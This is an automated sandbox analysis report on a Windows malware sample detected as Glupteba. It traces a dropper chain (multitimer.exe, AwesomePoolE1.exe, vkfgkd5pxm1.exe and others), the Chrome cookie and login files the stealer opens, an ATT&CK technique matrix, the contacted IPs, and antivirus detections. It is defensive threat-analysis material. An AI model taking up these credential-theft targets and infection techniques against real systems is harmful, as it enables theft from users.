            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_0102223D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 17_2_0102223D
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_01093211 GetTickCount,GetUserNameA, 17_2_01093211
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_010351D5 _free,_free,_free,GetTimeZoneInformation,_free, 17_2_010351D5
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Code function: 13_2_00401000 GetCommandLineA,lstrlenA,ExitProcess,GetVersion,GetWindowsDirectoryA,lstrlenA,lstrcatA,lstrcatA,ShellExecuteExA,ExitProcess,GetForegroundWindow,GetTickCount,GetProcessHeap, 13_2_00401000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected Glupteba
            Source: Yara match File source: 0000001C.00000002.867034664.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001C.00000002.841596778.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000002.866048884.0000000003790000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000001C.00000003.801918341.00000000040C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000003.801926180.0000000003FA0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: app.exe PID: 6452, type: MEMORY
            Source: Yara match File source: 19.2.app.exe.3790e50.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 19.2.app.exe.3790e50.5.unpack, type: UNPACKEDPE
            Source: Yara match File source: 19.3.app.exe.3fa0000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 19.2.app.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 19.2.app.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 19.3.app.exe.3fa0000.3.unpack, type: UNPACKEDPE
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data1

            Remote Access Functionality:

            Yara detected Glupteba (same Yara matches as listed under Stealing of Sensitive Information above)

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Native API 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | OS Credential Dumping 1 | System Time Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
            Default Accounts | Command and Scripting Interpreter 2 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 11 | Credential API Hooking 1 | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Proxy 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Windows Service 1 | Access Token Manipulation 1 | Obfuscated Files or Information 3 | Input Capture 1 | File and Directory Discovery 2 | SMB/Windows Admin Shares | Credential API Hooking 1 | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Registry Run Keys / Startup Folder 111 | Windows Service 1 | Software Packing 33 | NTDS | System Information Discovery 156 | Distributed Component Object Model | Input Capture 1 | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |
            Cloud Accounts | Cron | Network Logon Script | Process Injection 11 | Timestomp 1 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
            Replication Through Removable Media | Launchd | Rc.common | Registry Run Keys / Startup Folder 111 | DLL Side-Loading 1 | Cached Domain Credentials | Security Software Discovery 351 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
            External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion 1 | DCSync | Virtualization/Sandbox Evasion 4 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading 13 | Proc Filesystem | Process Discovery 11 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion 4 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
            Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Access Token Manipulation 1 | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
            Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Process Injection 11 | Input Capture | System Network Configuration Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

            Behavior Graph

            Behavior Graph ID: 352870 | Sample: SecuriteInfo.com.Generic.mg... | Start date: 15/02/2021 | Architecture: WINDOWS | Score: 100

            Start (sample execution)
              Network: 1.1.1.1 (CLOUDFLARENETUS, Australia)
              Signatures: Antivirus detection for URL or domain; Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; 9 other signatures
              Started: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe; multitimer.exe; svchost.exe; 2 other processes

            SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
              Network: 8.8.8.8 (GOOGLEUS, United States); 5.101.110.225 (DIGITALOCEAN-ASNUS, Netherlands)
              Dropped: C:\Users\user\AppData\...\multitimer.exe (PE32); C:\Users\user\...\multitimer.exe.config (XML); SecuriteInfo.com.G...dde149e46ee.exe.log (ASCII)
              Signatures: Detected unpacking (overwrites its own PE header)
              Started: multitimer.exe

            multitimer.exe (started from sample start)
              Signatures: Creates multiple autostart registry keys
              Started: multitimer.exe
                Dropped: C:\Users\user\AppData\...\AwesomePoolE1.exe (PE32); C:\Users\user\AppData\Local\...\safebits.exe (PE32)

            multitimer.exe (started from SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe)
              Network: 104.248.119.44 (DIGITALOCEAN-ASNUS, United States); 138.197.53.157 (DIGITALOCEAN-ASNUS, United States); 2 other IPs or domains
              Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (overwrites its own PE header); Machine Learning detection for dropped file
              Started: multitimer.exe
                Signatures: Creates multiple autostart registry keys
                Started: multitimer.exe
                  Network: 185.51.246.83 (ITLDC-NLUA, Ukraine); 94.130.16.32 (HETZNER-ASDE, Germany); 6 other IPs or domains
                  Dropped: C:\Users\user\AppData\Local\Temp\...\app.exe (PE32); C:\Users\user\AppData\...\tpwlxkeo40z.exe (PE32); C:\Users\user\AppData\...\5asqork1n2b.exe (PE32); 23 other files (9 malicious)
                  Started: 2mqvpn30gyk.exe; safebits.exe; vkfgkd5pxm1.exe; 4 other processes

            2mqvpn30gyk.exe
              Dropped: C:\Program Files\89C8W4UQTF\uninstaller.exe (PE32); C:\Program Files\89C8W4UQTF\89C8W4UQT.exe (PE32); C:\Program Files\...\uninstaller.exe.config (XML); C:\Program Files\...\89C8W4UQT.exe.config (XML)
              Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file

            safebits.exe
              Dropped: C:\Users\user\AppData\Roaming\...\jdfddn.dll (PE32)
              Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Creates multiple autostart registry keys; Tries to detect virtualization through RDTSC time measurements

            vkfgkd5pxm1.exe
              Network: 139.180.202.218 (AS-CHOOPAUS, United States)
              Dropped: C:\Users\user\AppData\Local\...\Login Data1 (SQLite)
              Signatures: Tries to harvest and steal browser information (history, passwords, etc)

            4 other processes
              Network: 212.86.114.14 (ON-LINE-DATAServerlocation-NetherlandsDrontenNL, Ukraine); 185.154.14.180 (ITLDC-NLUA, Ukraine)
              Dropped: C:\Users\user\AppData\...\vksqeekarkn.exe (PE32); C:\Users\user\AppData\...68oikfEU1.exe (PE32); C:\Users\user\AppData\Local\...\installer.tmp (PE32)

            Screenshots


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | 31% | Virustotal |
            SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | 27% | ReversingLabs | ByteCode-MSIL.Packed.Generic
            SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | 100% | Joe Sandbox ML |

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe | 100% | Avira | HEUR/AGEN.1138963
            C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | 100% | Avira | HEUR/AGEN.1133205
            C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe | 100% | Avira | HEUR/AGEN.1139468
            C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe | 100% | Avira | HEUR/AGEN.1133205
            C:\Program Files\89C8W4UQTF\uninstaller.exe | 100% | Avira | HEUR/AGEN.1133205
            C:\Program Files\89C8W4UQTF\89C8W4UQT.exe | 100% | Avira | HEUR/AGEN.1133205
            C:\Users\user\AppData\Local\Temp\qhmeucfqke0\AwesomePoolE1.exe | 100% | Avira | HEUR/AGEN.1139468
            C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | 100% | Avira | HEUR/AGEN.1138963
            C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | 100% | Joe Sandbox ML |
            C:\Program Files\89C8W4UQTF\uninstaller.exe | 100% | Joe Sandbox ML |
            C:\Program Files\89C8W4UQTF\89C8W4UQT.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe | 30% | Metadefender |
            C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe | 82% | ReversingLabs | ByteCode-MSIL.Downloader.FakeWave
            C:\Users\user\AppData\Local\Temp\2vze2wqfnvj\installer.exe | 64% | ReversingLabs | Win32.Adware.ProxyTracker
            C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe | 8% | Metadefender |
            C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe | 3% | ReversingLabs |
            C:\Users\user\AppData\Local\Temp\4sgbvongjvu\AwesomePoolE1.exe | 30% | Metadefender |
            C:\Users\user\AppData\Local\Temp\4sgbvongjvu\AwesomePoolE1.exe | 82% | ReversingLabs | ByteCode-MSIL.Downloader.FakeWave
            C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | 28% | ReversingLabs | ByteCode-MSIL.Adware.CSDIMonetize
            C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe | 30% | Metadefender |
            C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe | 82% | ReversingLabs | ByteCode-MSIL.Downloader.FakeWave

            Unpacked PE Files

            Source | Detection | Scanner | Label
            14.2.2mqvpn30gyk.exe.260000.0.unpack | 100% | Avira | HEUR/AGEN.1133205
            14.0.2mqvpn30gyk.exe.260000.0.unpack | 100% | Avira | HEUR/AGEN.1133205
            17.0.vkfgkd5pxm1.exe.1020000.0.unpack | 100% | Avira | HEUR/AGEN.1138963
            19.2.app.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1117055
            17.2.vkfgkd5pxm1.exe.1020000.3.unpack | 100% | Avira | HEUR/AGEN.1138963
            16.0.AwesomePoolE1.exe.650000.0.unpack | 100% | Avira | HEUR/AGEN.1139468
            13.2.safebits.exe.3660000.8.unpack | 100% | Avira | TR/Patched.Ren.Gen
            13.2.safebits.exe.400000.0.unpack | 100% | Avira | TR/Crypt.EPACK.Gen

            Domains

            No Antivirus matches

            URLs

            Source | Detection | Scanner | Label
            https://new.multitimer.fun | 0% | Avira URL Cloud | safe
            http://html4/loose.dtd | 0% | Avira URL Cloud | safe
            https://api.googlrapis.com/installer/ | 0% | Avira URL Cloud | safe
            https://digitalassets.ams3.digitaloceanspaces.comx | 0% | Avira URL Cloud | safe
            https://pc.inappapiurl.com/api/v1/tracking/buying | 0% | Avira URL Cloud | safe
            http://www.jiyu-kobo.co.jp/jp/H | 0% | Avira URL Cloud | safe
            http://crt.rootg2.amazontrust.com/rootg2.cer0= | 0% | URL Reputation | safe
            http://www.trustedlogos.com/ | 0% | Avira URL Cloud | safe
